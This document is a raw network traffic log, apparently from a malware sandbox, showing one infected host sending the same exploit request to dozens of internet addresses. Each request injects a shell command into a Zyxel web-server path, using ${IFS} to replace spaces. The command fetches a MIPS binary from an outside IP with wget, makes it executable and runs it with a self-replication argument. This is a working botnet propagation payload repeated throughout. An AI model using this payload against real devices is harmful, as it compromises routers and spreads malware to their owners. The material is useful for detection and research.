                                                Jan 12, 2024 18:24:42.025492907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6049192.168.2.1341822163.207.171.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025589943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6050192.168.2.1354400121.98.1.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025676966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6051192.168.2.134242460.197.135.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025770903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6052192.168.2.1359776216.100.243.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025809050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6053192.168.2.1345602207.105.166.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025903940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6054192.168.2.1342698202.47.60.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025958061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6055192.168.2.134315649.180.224.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026030064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6056192.168.2.1359770119.46.241.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026087999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6057192.168.2.1352870186.183.238.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026151896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6058192.168.2.1343952103.100.186.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026205063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6059192.168.2.1334730126.51.114.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026386976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6060192.168.2.1359576191.113.43.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026434898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6061192.168.2.134129086.200.183.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026515007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6062192.168.2.1356616195.251.86.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026577950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6063192.168.2.134040238.219.145.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026654959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6064192.168.2.135358683.162.115.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026735067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6065192.168.2.1337542212.109.94.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026797056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6066192.168.2.136008480.136.249.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026881933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6067192.168.2.1347678151.107.46.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.026952028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6068192.168.2.1336108210.148.7.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027004957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6069192.168.2.133592066.167.147.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027095079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6070192.168.2.1345820168.197.197.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027164936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6071192.168.2.1342772156.42.121.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027255058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6072192.168.2.1336128178.15.192.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027316093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6073192.168.2.1351892201.84.107.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027385950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6074192.168.2.1360194115.88.56.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027468920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6075192.168.2.1351292187.41.14.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027524948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6076192.168.2.1333906190.188.70.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027607918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6077192.168.2.1359954200.126.193.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027662992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6078192.168.2.1338868159.161.57.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027740955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6079192.168.2.134346473.145.254.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027798891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6080192.168.2.1358816223.30.209.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027875900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6081192.168.2.1351884209.44.50.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.027947903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6082192.168.2.135112214.202.39.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.028004885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6083192.168.2.135795871.90.211.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.028106928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6084192.168.2.135443673.137.12.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.028191090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6085192.168.2.1340844217.26.255.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.028245926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6086192.168.2.1334738217.194.47.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.028350115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6087192.168.2.133751869.213.114.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.028397083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6088192.168.2.1345898184.224.187.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.028476000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6089192.168.2.1353522129.143.38.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.028542042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6090192.168.2.133561824.32.170.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.028611898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6091192.168.2.134550285.160.25.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.028686047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6092192.168.2.1353668195.115.125.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.033726931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6093192.168.2.134851872.225.119.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.033813000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6094192.168.2.1338266190.182.90.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.033819914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6095192.168.2.1353792120.238.44.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.033854008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6096192.168.2.1333392177.121.118.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.033930063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6097192.168.2.1336812113.117.231.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.033946991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6098192.168.2.1353930155.141.253.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.033987045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6099192.168.2.1351460222.106.77.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034013987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6100192.168.2.1358126217.164.250.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034075022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6101192.168.2.1336488195.208.139.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034086943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6102192.168.2.1346794119.2.237.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034145117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6103192.168.2.1346198151.105.190.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034197092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6104192.168.2.133308418.249.104.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034262896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6105192.168.2.1354982168.215.150.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034295082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6106192.168.2.1351688135.69.54.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034331083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6107192.168.2.1353122221.96.186.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034384966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6108192.168.2.1333036180.12.76.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034400940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6109192.168.2.135983687.77.63.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034455061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6110192.168.2.133812436.193.66.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:43.034477949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6111192.168.2.134055836.18.68.57443
                                                TimestampBytes transferredDirectionData
